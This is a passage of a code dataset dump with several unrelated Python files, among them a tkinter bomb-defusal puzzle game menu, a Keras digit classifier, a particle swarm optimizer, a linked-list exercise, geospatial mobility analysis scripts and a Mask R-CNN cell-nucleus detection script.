0)\n","sub_path":"gitstats/collector/StatisticsCollector/AuthorStrategy.py","file_name":"AuthorStrategy.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"130430166","text":"from tkinter import *\r\nfn1 = Tk()\r\nfn1.title('La Bombe - Menu')\r\nimport random\r\n\r\nfn1.configure(width=1187,height=695)\r\nfn1.resizable(width=False,height=False)\r\nfn1.rowconfigure(0,weight=1)\r\nfn1.columnconfigure(0,weight=1)\r\n\r\nreturne=PhotoImage(file='return1.gif')\r\nphoto1=PhotoImage(file='plaque2.gif')\r\ntextexit=PhotoImage(file='textexit1.gif')\r\nLogo=PhotoImage(file='logo1.gif')\r\nrules=PhotoImage(file='carules1.gif')\r\nphoto2=PhotoImage(file='viseur2.gif')\r\nphoto3=PhotoImage(file='touche1.gif')\r\nLumi=PhotoImage(file='lumi1.gif')\r\nGO=PhotoImage(file='go1.gif')\r\n\r\ncan= Canvas(fn1,width=1187,height=695,bg='dark grey')\r\ncan.create_image(595,350, image=photo1)\r\ncan.create_image(950,570, image=textexit, tag='a1')\r\ncan.create_image(595,350, image=Logo, tag='a2')\r\ncan.create_image(212,550, image=rules, tag='a3')\r\ncan.create_image(1075,120, image=Lumi)\r\ncan.grid(sticky=NSEW)\r\n\r\ndef changer4(event):\r\n command = fn.destroy()\r\ndef delete(MonTag):\r\n can.delete(can.find_withtag(MonTag))\r\n\r\ndef changer1(event):\r\n command = fn1.destroy()\r\n\r\ndef changerfe1(event):\r\n if can.find_withtag('a3'):\r\n delete('a1')\r\n delete('a2')\r\n delete('a3')\r\n fn1.title('La Bombe - les règles')\r\n can.create_image(975,570, image=returne, tag='c1')\r\n can.create_text(593,115,text=\"Sur le sujet de la mémoire\", fill='red', font=\"Times 50 bold\")\r\n can.create_text(360,210,text=\"La mémoire est une chose fragile,\", fill='black', font=\"Times 25 bold\")\r\n can.create_text(470,265,text=\"mais tout le reste l'est aussi lorsqu'une bombe explose,\", font=\"Times 20\")\r\n can.create_text(280,310,text=\"donc fais attention !\", font=\"Times 20\")\r\n can.create_text(510,365,text=\"Appuyez sur le bouton correct pour passer au module suivant.\", font=\"Times 20\")\r\n can.create_text(465,420,text=\"Compléter toutes les étapes pour désarmer le module.\", font=\"Times 20\")\r\n can.create_text(378,465,text=\"En appuyant sur un bouton incorrect,\", font=\"Times 20\")\r\n can.create_text(338,510,text=\" le module est remis à l'étape 1.\", font=\"Times 20\")\r\n can.grid(row=0,column=0, sticky='NSEW')\r\n can.tag_bind(\"c1\", \"\", changer4)\r\n\r\ndef changerfe2(event):\r\n if can.find_withtag('a2'):\r\n delete('a2')\r\n delete('a3')\r\n fn1.title('La Bombe - le jeu')\r\n can.create_image(450,300, image=photo2)\r\n can.create_image(225,585, image=photo3)\r\n can.create_image(335,585, image=photo3)\r\n can.create_image(445,585, image=photo3)\r\n can.create_image(555,585, image=photo3)\r\n can.create_image(665,585, image=photo3)\r\n can.create_text(225,580, text='1', fill='red', font=\"Times 50 bold\")\r\n can.create_text(335,580, text='2', fill='red', font=\"Times 50 bold\")\r\n can.create_text(445,580, text='3', fill='red', font=\"Times 50 bold\")\r\n can.create_text(555,580, text='4', fill='red', font=\"Times 50 bold\")\r\n can.create_text(665,580, text='5', fill='red', font=\"Times 50 bold\")\r\n can.create_image(950,328, image=GO, tag='de')\r\n can.grid(row=0,column=0, sticky='NSEW')\r\n can.tag_bind('de', \"\", changerAZ)\r\n\r\ncan.tag_bind(\"a1\", \"\", changer1)\r\ncan.tag_bind(\"a2\", \"\", changerfe2)\r\ncan.tag_bind(\"a3\", \"\", changerfe1)\r\n\r\nfn1.mainloop()","sub_path":"projet bombe/les py + traduction/phase 2.py","file_name":"phase 2.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"354470726","text":"import tensorflow as tf\n\nfrom tensorflow.keras import datasets, layers, models\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport os\n\n\ndef loadModel():\n new_model = models.load_model('model3.h5')\n new_model.summary()\n return new_model\n\ndef showGrayImage(image):\n plt.figure(1)\n plt.imshow(image[:,:,0], cmap='gray')\n plt.show()\n\ndef openImage(url):\n img_raw = tf.io.read_file(url)\n\n img = tf.image.decode_image(img_raw)\n img = tf.image.resize(img, [28,28])\n img = tf.image.rgb_to_grayscale(img)\n img = img.numpy()\n\n return img\n\ndef predict(model, image):\n img_pre = image.reshape(-1, 28, 28, 1) / 255.0\n img_pre.shape\n\n pre = model.predict(img_pre)\n return pre\n\ndef plot_pre(pre):\n plt.grid(False)\n plt.xticks(range(10))\n plt.yticks([])\n thisplot = plt.bar(range(10), pre, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(pre)\n thisplot[predicted_label].set_color('blue')\n for i in range(10):\n plt.text(i, pre[i], '%.1f %%' % (pre[i]*100), ha='center', va='bottom')\n\n plt.figure(1)\n plt.show()\n\ndef start(url):\n img = openImage(url)\n showGrayImage(img)\n \n model = loadModel()\n res = predict(model, img)\n plot_pre(res[0])\n\n print(res)\n print(np.argmax(res))\n\nif __name__ == \"__main__\":\n start('number_test/2(1).jpg')","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261715871","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"aiotus\",\n version=\"0.1.3\",\n author=\"Jens Steinhauser\",\n author_email=\"jens.steinhauser@gmail.com\",\n description=\"Asynchronous tus (tus.io) client library\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/JenSte/aiotus\",\n project_urls={\"Documentation\": \"https://aiotus.readthedocs.io\"},\n license=\"Apache 2\",\n packages=setuptools.find_packages(),\n package_data={\"aiotus\": [\"py.typed\"]},\n include_package_data=True,\n zip_safe=False,\n entry_points={\n \"console_scripts\": [\n \"aiotus-upload=aiotus.entrypoint:aiotus_upload\",\n \"aiotus-metadata=aiotus.entrypoint:aiotus_metadata\",\n ]\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Typing :: Typed\",\n ],\n python_requires=\">=3.7\",\n install_requires=[\"aiohttp\", \"tenacity\"],\n setup_requires=[\"setuptools_scm\"],\n use_scm_version={\"local_scheme\": \"dirty-tag\"},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"603916106","text":"import numpy as np\n\nimport entropy.utils as utils\nfrom entropy.CountMotif_nr import countMotifs\nfrom entropy.Entropy import graphEntropy\nfrom entropy.countedge import countEdge\nfrom entropy.edge_entropy import edgeEntropy\n\n\ndef writeEdgeEntropy(graphfile):\n if graphfile.endswith(\".xlsx\"):\n graphfile=utils.translata_xlsx_to_csv(graphfile)\n print('转变格式成功')\n A, nodN = utils.read_adjMatrix_csv(graphfile)\n print('A\\n'+str(A))\n temp=countEdge(A,nodN)\n print('count_edge\\n'+str(temp))\n return edgeEntropy(graphEntropy(countMotifs(A,nodN),nodN),temp)\n #return countEdge(A,nodN)\n\n#print(writeEdgeEntropy('./data/graph11.xlsx'))\n\ndef writeEdgeAttribute(graph_ids,adj):\n edge_entropys=[]\n # build graphs with nodes\n edge_index=0\n node_index_begin=0\n for g_id in set(graph_ids):\n print('正在处理图:'+str(g_id))\n node_ids = np.argwhere(graph_ids == g_id).squeeze()\n node_ids.sort()\n\n temp_nodN=len(node_ids)\n temp_A=np.zeros([temp_nodN,temp_nodN],int)\n\n edge_index_begin=edge_index\n\n while (edge_index c:\n break\n elif prev == c:\n equal.append(int(c))\n if i == (len(code_str) - 1):\n for e in equal:\n if equal.count(e) == 1:\n ok = True\n prev = c\n if ok:\n num += 1\n debug.append(code)\n print(f\"{debug}\")\n return num\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('input', help=\"File containing day 4 input data\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n Day4(args.input)\n","sub_path":"2019/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"196527212","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nfrom bson.objectid import ObjectId\nfrom mock import patch\n\nfrom advapp import create_app, AppConfig\nfrom advauth.userauth import AuthService\nfrom models import connection\n\nclass AdvAuthActionsTest(unittest.TestCase):\n\n def setUp(self):\n test = self\n username = 'test user: {0}'.format(repr(self))\n test_user = dict(name=username, chances=222)\n self.database = connection()\n self.user_id = str(self.database.accounts.insert(test_user))\n class TestWebClient(object):\n def receive_tokens(self, code):\n return dict(access_token='test_access_token')\n def user_info(self, access_token):\n return dict(id=test.user_id, username=username)\n self.webclient_mock = TestWebClient()\n class TestConf(AppConfig):\n TESTING = True\n self.app = create_app(TestConf).test_client()\n\n def tearDown(self):\n self.database.accounts.remove(ObjectId(self.user_id))\n\n def test_process_code(self):\n with patch.object(AuthService, 'webclient', self.webclient_mock):\n resp = self.app.get('/oauth2/redirect?code=test_auth_code')\n self.assertEquals(resp.status_code, 302)\n","sub_path":"tests/advauth/advauth_test.py","file_name":"advauth_test.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"74151620","text":"def wrap(width, text):\n # VARIABLES\n str_line = \"\" \n str_lines = \"\" \n \n for word in text.split():\n if (len(str_line) + len(word) + 1 < width):\n str_line = str(str_line) + str(word) + \" \"\n else:\n str_lines += str(str_line + \"\\n\")\n str_line = str(word) + \" \"\n \n str_lines += str(str_line + \"\\n\")\n str_lines = str_lines[:-2]\n return str_lines\n\ndef printWrapped(width, text):\n print(wrap(width, text))\n\ndef header(headerName):\n print(\"===============================================================================\")\n print(headerName)\n print(\"===============================================================================\")\n\ndef invertWords(string):\n invertedString = []\n string = string.split()\n for i in range(len(string), 0, -1):\n invertedString.append(string[i-1])\n return invertedString\n ","sub_path":"MT_Texts.py","file_name":"MT_Texts.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"162026443","text":"from .base import BaseEA\nfrom eas import EA\nimport numpy as np\nfrom eas.helper import init_vector\nfrom copy import deepcopy\n\n\n# paper\n# Shi, Y., & Eberhart, R. C. (1999, July). Empirical study of particle swarm optimization.\n# In Proceedings of the 1999 Congress on Evolutionary Computation-CEC99 (Cat. No. 99TH8406) (Vol. 3, pp. 1945-1950).\n# IEEE.\nclass PSO(EA):\n def __init__(self, *args, vlb=None, vub=None, **kwargs):\n super(PSO, self).__init__(*args, **kwargs)\n self.vlb = vlb if vlb else ([-5] * self.n)\n self.vub = vub if vub else ([5] * self.n)\n\n self.vc = np.array([init_vector(self.n, self.vub, self.vlb) for _ in range(self.np)])\n # self.vcg = lambda cg: self.vc - self.vc * cg / self.max_gen\n # 记录每一个体的历史最优\n self.psc = deepcopy(self.sc)\n # 参数生成\n self.wg = lambda cg: 0.9 - cg * 0.4 / self.max_gen\n self.r1g = lambda: 0.05\n self.r2g = lambda: 0.05\n\n def run(self, g):\n w = self.wg(g)\n r1 = self.r1g()\n r2 = self.r2g()\n\n for i in range(self.np):\n # 更新速度\n # print(self.vc[i])\n for j in range(self.n):\n ir1, ir2 = np.random.random(2)\n # self.sc[0,j] 总是当前全局最优\n self.vc[i,j] = w * self.vc[i,j] + \\\n r1 * ir1 * (self.psc[i,j] - self.sc[i,j]) + \\\n r2 * ir2 * (self.sc[0,j] - self.sc[i,j])\n\n self.vc[i] = self.bs(self.vc[i], self.vub, self.vlb)\n\n s_new = self.sc[i] + self.vc[i]\n s_new = self.bs(s_new, self.ub, self.lb)\n\n if not self.better_than(i, s_new):\n self.sc[i] = s_new\n # 记录个体历史最优\n if not self.better_than(i, self.psc[i]):\n self.psc[i] = deepcopy(self.sc[i])\n\n def sort(self):\n flag = 1 if self.optimal_minimal else -1\n self.fc = self.equip_procedure_all()\n sorted_indexes = np.argsort(flag * self.fc)\n self.sc = self.sc[sorted_indexes]\n self.psc = self.psc[sorted_indexes]\n self.vc = self.vc[sorted_indexes]\n self.fc = self.fc[sorted_indexes]","sub_path":"eas/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"213255445","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Python program to find the maximum for each\n# and every contiguous subarray of size k\n\nfrom collections import deque\n\n# A Deque (Double ended queue) based method for printing \n# maximum element of all subarrays of size k\ndef printMax (arr, n, k):\n \"\"\" Create a Double Ended Queue, Qi that will store indexes\n of array elements. The queue will store indexes of largest\n elements in every window and it will maintain decreasing\n order of values from front to rear in Qi, i.e.\n arr [Qi.front ()] to arr [Qi.rear ()] are in decreasing order\"\"\"\n Qi = deque ()\n # Process first k (or first window) elements of array\n for i in range (k):\n # Remove all elements smaller than current element to add\n while Qi and arr [i] >= arr [Qi [-1]]: Qi.pop ()\n # Add new element at rear of queue\n Qi.append (i)\n # Process rest of the elements, i.e. from arr [k] to arr [n-1]\n for i in range (k, n):\n # front queue element is largest of previous window → print it\n print (str (arr [Qi [0]]) + \" \", end = \"\")\n # Remove the elements which are out of current window\n while Qi and Qi [0] <= i - k: Qi.popleft ()\n # Remove all elements smaller than current element to add\n while Qi and arr [i] >= arr [Qi [-1]]: Qi.pop ()\n # Add current element at the rear of Qi\n Qi.append (i)\n # Print the maximum element of last window\n print (str (arr [Qi [0]]))\n \n# Driver programm to test above fumctions\ndef main ():\n arr = [12, 1, 78, 90, 57, 89, 56]\n k = 3\n printMax (arr, len (arr), k)\nif __name__ == \"__main__\":\n main () \n# This code is contributed by Shiv Shankar\n\n","sub_path":"2017/hackerrank/max_queue_of_shifting_contiguos_subarray.py","file_name":"max_queue_of_shifting_contiguos_subarray.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"125886242","text":"# section05-2\n# 파이썬 흐름제어(반복문)\n# 반복문 실습\n\n# 코딩의 핵심 -> 조건 해결 중요\n\n# 기본 반복문 : for, while\n\nv1 = 1\nwhile v1 < 11:\n print(\"v1 is : \", v1)\n v1 += 1\n\nfor v2 in range(10):\n print(\"v2 is :\", v2)\n\nfor v3 in range(1, 11):\n print(\"v3 is :\", v3)\n\n# 1-100 sum\nsum1 = 0\ncnt1 = 1\nwhile cnt1 <= 100:\n sum1 += cnt1\n cnt1 += 1\nprint(\"1~100 : \", sum1)\nprint(\"1~100 : \", sum(range(1, 101)))\nprint(\"1~100 :\", sum(range(1, 101, 2)))\n\n# 시퀀스 (순서가 있는) 자료형 반복\n# 문자열, 리스트, 튜플, 집합, 사전\n# iterable 리턴 함수 : range, reversed, enumerate, filter, amp, zip\n\nnames = [\"Kim\", \"Park\", \"Cho\", \"Choi\", \"Yoo\"]\n\nfor name in names:\n print(name, end=\" \")\n\nprint()\nword = \"dreams\"\nfor s in word:\n print(\"word : \", s)\n\nmy_info = {\n \"name\": \"Kim\",\n \"age\": 33,\n \"city\": \"Seoul\"\n}\n\n# 기본 값은 키\nfor key in my_info:\n print(\"my_info\", key)\n\n# 값\nfor key in my_info.values():\n print(\"my_info\", key)\n\n# 키\nfor key in my_info.keys():\n print(\"my_info\", key)\n\n# 키 and 값\nfor k, v in my_info.items():\n print(\"my_info\", k, v)\n\nname = \"KennRY\"\n\nfor n in name:\n if n.isupper():\n print(n.lower())\n else:\n print(n.upper())\n\n# break\nnumbers = list(range(1, 6))\nfor num in numbers:\n if num == 3:\n print(num)\n break\n\n\n# continue\nfor num in numbers:\n if num == 3:\n print(num)\n continue\n","sub_path":"section05-2.py","file_name":"section05-2.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"329444079","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 6 18:07:18 2019\n\n@author: sinsakuokazaki\n\"\"\"\n\nclass Node:\n def __init__(self, data = None, next_node = None):\n self.data = data\n self.next_node = next_node\n \n def append(self, data):\n end = Node()\n end.data = data\n while self.next_node:\n self = self.next_node\n self.next_node = end\n def __str__(self):\n return str(self.data)\n \nnode = Node(\"a\")\nnode.append(\"b\")\nnode.append(\"c\")\nnode.append(\"d\")\nnode.append(\"e\")\nnode.append(\"f\")\nnode.append(\"g\")\n\n#delete an element in middle of linked list\ndef deleteElement(node):\n if node == None or node.next_node == None:\n return False\n \n nextNode = node.next_node\n node.data = nextNode.data\n node.next_node = nextNode.next_node\n \nresult = deleteElement(node.next_node)\n\nwhile node.next_node:\n print(node)\n node = node.next_node","sub_path":"deleteElement.py","file_name":"deleteElement.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179561162","text":"import datetime\n\nimport geopandas as gpd\nfrom Geospatial.Scraper import GeoScraper, BritishColumbia, Canada\n\n# Process mobility related indicators for elementslab\nregions = {\n 'Canada':\n {\n 'British Columbia': ['Capital Regional District', 'Metro Vancouver']\n }\n}\n\nfor key, value in regions.items():\n date_list = [str((datetime.datetime(2018, 5, 31) - datetime.timedelta(days=x)).date()) for x in range(30)]\n\n bc = BritishColumbia(cities=value['British Columbia'])\n country = Canada(provinces=[bc])\n\n country.update_databases(census=False) # StatsCan\n for city in bc.cities: city.update_databases(bound=False, net=False)\n\n windows = False\n if windows: bca_dir = '//nas.sala.ubc.ca/ELabs/50_projects/16_PICS/07_BCA data/'\n else: bca_dir = '/Volumes/ELabs/50_projects/16_PICS/07_BCA data/'\n\n bc.get_bc_transit(urls=['http://victoria.mapstrat.com/current/google_transit.zip',\n 'local'], run=False, down=False) # BC Transit\n bc.aggregate_bca_from_field(\n run=False, join=False, classify=False,\n inventory_dir=f'{bca_dir}170811_BCA_Provincial_Data/Inventory Information - RY 2017.csv',\n geodatabase_dir=f'{bca_dir}Juchan_backup/BCA_2017_roll_number_method/BCA_2017_roll_number_method.gdb')\n\n for city in bc.cities:\n scraper = GeoScraper(city=city)\n for date in date_list: scraper.public_transit(False, date) # Transit Land\n lda_gdf = gpd.read_file(city.gpkg, layer='land_dissemination_area')\n city.centrality(run=True, axial=True, layer='network_walk')\n city.centrality(run=True, osm=True, layer='network_drive')\n x_features = city.network_analysis(\n run=True,\n service_areas=[400, 800, 1600],\n sample_gdf=lda_gdf,\n aggregated_layers={\n 'network_axial': [\"closeness\", \"betweenness\", \"length\"],\n 'network_nodes': [\"closeness\", \"betweenness\"],\n 'network_cycle': ['length'],\n 'network_drive': [\"betweenness\"],\n 'network_transit': ['frequency'],\n 'land_assessment_fabric': [\"n_use\", \"YEAR_BUILT\", \"TOTAL_FINISHED_AREA\", \"GROSS_BUILDING_AREA\",\n \"NUMBER_OF_BEDROOMS\", \"NUMBER_OF_BATHROOMS\"],\n 'land_assessment_parcels': ['area_sqkm', 'n_size'],\n 'land_dissemination_area': ['Population, 2016', 'Population density per square kilometre, 2016',\n 'Total private dwellings, 2016']\n })\n city.p_values(\n df=lda_gdf,\n x_features=x_features,\n y_features=['walk', 'bike', 'drive', 'bus'])\n\nparcels = {\n \"BC\": \"https://pub.data.gov.bc.ca/datasets/4cf233c2-f020-4f7a-9b87-1923252fbc24/ParcelMapBCExtract.zip\"\n}\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"615106382","text":"import re\nfrom urllib.request import urlopen\ndef find(x):\n srch=str(x)\n word = x\n url = \"http://dictionary.reference.com/browse/\"+srch+\"?s=t\"\n x=urlopen(url)\n x=x.read()\n \n items=re.findall(b'',b'')\n m=re.findall(b'at Dictionary.com, a free online dictionary with pronunciation, synonyms and translation. Look it up now! \"/>',z)\n if m==[]:\n if z.startswith(b\"Get your reference question answered by Ask.com\"):\n return False\n else:\n remo1 = len(word) + len(' definition, ') \n remo2 = -len(' See more.\"/>')\n\n return (z[remo1:remo2].decode(\"utf-8\") )\n else:\n return False\n","sub_path":"definition.py","file_name":"definition.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"23874803","text":"\"\"\"\nMask R-CNN\nTrain and detect on the Cell dataset for nucleus detection\n\nWritten by Stefano Gatti\n\n------------------------------------------------------------\n\nUsage: run from command line\nParameters:\n # General\n command -> Either 'train' for the training, or 'test' for testing the network.\n # Training\n --dataset -> The folder of the dataset to use for training. Must be divided in 'train' and 'val' subfolders.\n --weights -> The location of the .h5 file to load a previous model or 'coco' to use the COCO model.\n --epochs -> The number of epochs to run training.\n --logs -> The folder where logs will be saved. Defaults to ./logs.\n # Testing\n --image -> The image to run detection on during testing. Use this or '--dir'.\n --dir -> The folder containing the images to run detection on during testing. Use this or '--image'.\n --channel_number -> The number of channels of the input images. Defaults to 3.\n --display_image -> Whether to display the result of testing ot not.\nExamples:\n # Training\n python CellNucleusDetection.py train --dataset=../datasets/DatasetGeneChannels --weights=../models/cellSegmentation_RPN_only/mask_rcnn_cell_0010.h5 --epochs=20\n # Testing\n python CellNucleusDetection.py test --dir=\"../datasets/DatasetGeneChannels/train\" --weights=\"../models/nucleiSegmentation_all/mask_rcnn_cell_0020.h5\"\n\"\"\"\n\n# Generic imports\nimport os\nimport re\nimport sys\nimport json\nimport time\nimport numpy as np\nimport skimage.draw\nfrom imgaug import augmenters as iaa\n\n# Define the root directory of the project\nROOT_DIR = os.path.abspath(\"../\")\nsys.path.append(ROOT_DIR)\n\n# Import local files\nfrom cell.CellConfiguration import CellConfigDefault\nfrom mrcnn import model as modellib, utils, visualize as viz\n\n############################################################\n# Global variables\n############################################################\nCOCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5\")\nDEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n\n############################################################\n# Configuration\n############################################################\nclass CellConfigNuclei(CellConfigDefault):\n \"\"\"\n Specialization of the config file for the network that needs to detect the nuclei.\n In the future, this will include a constructor method to define dynamically the channel count.\n \"\"\"\n # Number of classes (including background)\n # We only need to detect the nuclei, so only 1 additional class\n NUM_CLASSES = 1 + 1\n\n # Number of color channels per image\n # Changing this requires other changes in the code. See the WIKI for more\n # details: https://github.com/matterport/Mask_RCNN/wiki\n # Right now we are using images with 2 genes\n IMAGE_CHANNEL_COUNT = 1 + 2\n\n # Image mean (RGB)\n # Must have length equal to IMAGE_CHANNEL_COUNT\n # Values could depend on brightness of layer\n MEAN_PIXEL = np.array([123.7, 116.8, 103.9])\n\n # Input image resizing\n # IMAGE_MIN_DIM is the size of the scaled shortest side\n # IMAGE_MAX_DIM is the maximum allowed size of the scaled longest side\n # Due to the large number of nuclei, the image must be heavily downscaled\n IMAGE_MIN_DIM = 512\n IMAGE_MAX_DIM = 512\n\n # Length of square anchor side in pixels\n RPN_ANCHOR_SCALES = (16, 32, 64, 128, 256)\n\n # Maximum number of ground truth instances and final detections\n # These must definitely be higher\n MAX_GT_INSTANCES = 600\n DETECTION_MAX_INSTANCES = 600\n\n # ROIs kept after tf.nn.top_k and before non-maximum suppression\n # May need adjusting due to high cell count\n PRE_NMS_LIMIT = 3000\n\n # ROIs kept after non-maximum suppression (training and inference)\n # May need adjusting due to high cell count\n POST_NMS_ROIS_TRAINING = 1000\n POST_NMS_ROIS_INFERENCE = 800\n\n QUADRANTS = [\"TL\", \"TR\", \"BL\", \"BR\", \"CC\"]\n\n\n############################################################\n# Dataset\n############################################################\nclass CellDatasetNuclei(utils.Dataset):\n\n def load_cell(self, dataset_dir, subset, quadrants):\n \"\"\"Load a subset of the Cell dataset.\n dataset_dir: Root directory of the dataset.\n subset: Subset to load: train or val\n \"\"\"\n # Add classes.\n # We have only one class: the nucleus of a cell.\n self.add_class(\"nucleus\", 1, \"nucleus\")\n\n # Train or validation dataset?\n assert subset in [\"train\", \"val\"]\n dataset_dir = os.path.join(dataset_dir, subset)\n\n # Load the annotations form the json file\n annotations = json.load(open(os.path.join(dataset_dir, \"via_mask_annotations_json.json\")))\n annotations = list(annotations.values()) # don't need the dict keys\n\n # Skip unannotated images\n annotations = [a for a in annotations if a['regions']]\n\n # Analyze the annotations to add images and ground truths.\n for a in annotations:\n # Load the polygons in [[x1, y1], ...] format\n polygons = [r['shape_attributes'] for r in a['regions'] if r[\"region_attributes\"][\"gene expression\"]]\n\n # Next, we need to load the image path and the image size\n # if the dataset becomes too big, having the values directly in the json becomes necessary\n image_path = os.path.join(dataset_dir, a['filename'])\n img = skimage.io.imread(image_path)\n height, width = img.shape[:2]\n q_height = height // 2\n q_width = width // 2\n\n for q in quadrants:\n if q == \"TL\":\n q_start_x, q_start_y = 0, 0\n elif q == \"TR\":\n q_start_x, q_start_y = q_width, 0\n elif q == \"BL\":\n q_start_x, q_start_y = 0, q_height\n elif q == \"BR\":\n q_start_x, q_start_y = q_width, q_height\n elif q == \"CC\":\n q_start_x, q_start_y = q_width // 2, q_height // 2\n self.add_image(\n \"nucleus\",\n image_id=a[\"filename\"],\n path=image_path,\n width=width, height=height,\n polygons=polygons,\n quadrant=(q_start_x, q_start_y, q_width, q_height))\n\n def load_mask(self, image_id):\n \"\"\"Generate instance masks for an image.\n Returns:\n masks: A bool array of shape [height, width, instance count] with\n one mask per instance.\n class_ids: a 1D array of class IDs of the instance masks.\n \"\"\"\n # If not a cell dataset image, delegate to parent class\n info = self.image_info[image_id]\n if info[\"source\"] != \"nucleus\":\n return super(self.__class__, self).load_mask(image_id)\n\n # Load the quadrant of the image\n height = info[\"height\"]\n width = info[\"width\"]\n q_start_x, q_start_y, q_width, q_height = info[\"quadrant\"]\n\n polygons = []\n for p in info[\"polygons\"]:\n all_x, all_y = p[\"all_points_x\"], p[\"all_points_y\"]\n if np.all(np.less(all_x, q_start_x)) \\\n or np.all(np.less(all_y, q_start_y)) \\\n or np.all(np.greater(all_x, q_start_x+q_width)) \\\n or np.all(np.greater(all_y, q_start_y+q_height)):\n continue\n polygons.append(p)\n\n # Compute the number of nuclei\n num_nuclei = len(polygons)\n\n # Define the class ids\n class_ids = np.ones(num_nuclei, dtype=np.uint8)\n\n # Set the masks for each instance\n mask = np.zeros([height, width, num_nuclei], dtype=np.uint8)\n for i, p in enumerate(polygons):\n rr, cc = skimage.draw.polygon(p[\"all_points_y\"], p[\"all_points_x\"])\n mask[rr, cc, i] = 1\n\n # Cut the mask to the quadrant\n final_mask = mask[q_start_y:q_start_y+q_height, q_start_x:q_start_x+q_width, :]\n\n # Return mask and class ID array\n return final_mask.astype(np.bool), class_ids\n\n def load_image(self, image_id):\n # If not a cell dataset image, delegate to parent class\n info = self.image_info[image_id]\n if info[\"source\"] != \"nucleus\":\n return super(self.__class__, self).load_mask(image_id)\n # Load image\n image = skimage.io.imread(self.image_info[image_id]['path'])\n # Load the quadrant info\n q_start_x, q_start_y, q_width, q_height = info[\"quadrant\"]\n # Slice the image to the quadrant\n image = image[q_start_y:q_start_y+q_height, q_start_x:q_start_x+q_width, :]\n return image\n\n def image_reference(self, image_id):\n \"\"\"Return the path of the image.\"\"\"\n info = self.image_info[image_id]\n if info[\"source\"] == \"nucleus\":\n return info[\"path\"]\n else:\n super(self.__class__, self).image_reference(image_id)\n\n\n############################################################\n# Training\n############################################################\ndef train(model, dataset, config, epochs):\n \"\"\"Train the model.\"\"\"\n\n # Training dataset\n dataset_train = CellDatasetNuclei()\n dataset_train.load_cell(dataset, \"train\", config.QUADRANTS)\n dataset_train.prepare()\n\n # Validation dataset\n dataset_val = CellDatasetNuclei()\n dataset_val.load_cell(dataset, \"val\", config.QUADRANTS)\n dataset_val.prepare()\n\n # Select the layers to train\n layers = \"heads\"\n\n # Define the augmentation of for the dataset\n augmentation = iaa.Sequential([\n iaa.Fliplr(0.5),\n iaa.Flipud(0.5)\n ])\n\n # Finally, train the model\n print(f\"\\n----Beginning training----\\n\")\n model.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=epochs,\n layers=layers,\n augmentation=augmentation)\n\n\n############################################################\n# Testing\n############################################################\ndef test(model, images_path, targets, do_display):\n tot_n = 0\n acc_n = 0\n time_n = 0\n\n for img_i, (image_path, target) in enumerate(zip(images_path, targets)):\n # Run model detection\n print(f\"Running on {image_path}\")\n img_start = time.time()\n\n # Read image\n input_image = skimage.io.imread(image_path)\n input_image = input_image[512:1546, 512:1546]\n\n # Detect cells\n r = model.detect([input_image], verbose=0)[0]\n\n # Print results of current image\n print(\"\\tTest results\")\n nuclei_num = len(r['class_ids'])\n tot_n += nuclei_num\n if target == 0:\n if nuclei_num == 1:\n nuclei_acc = 1\n else:\n nuclei_acc = 0\n else:\n nuclei_acc = nuclei_num / target\n acc_n += nuclei_acc\n print(f\"\\t\\tNuclei found: {nuclei_num}\\n\\t\\tAccuracy: {100 * nuclei_acc}%\")\n\n # Detection time\n 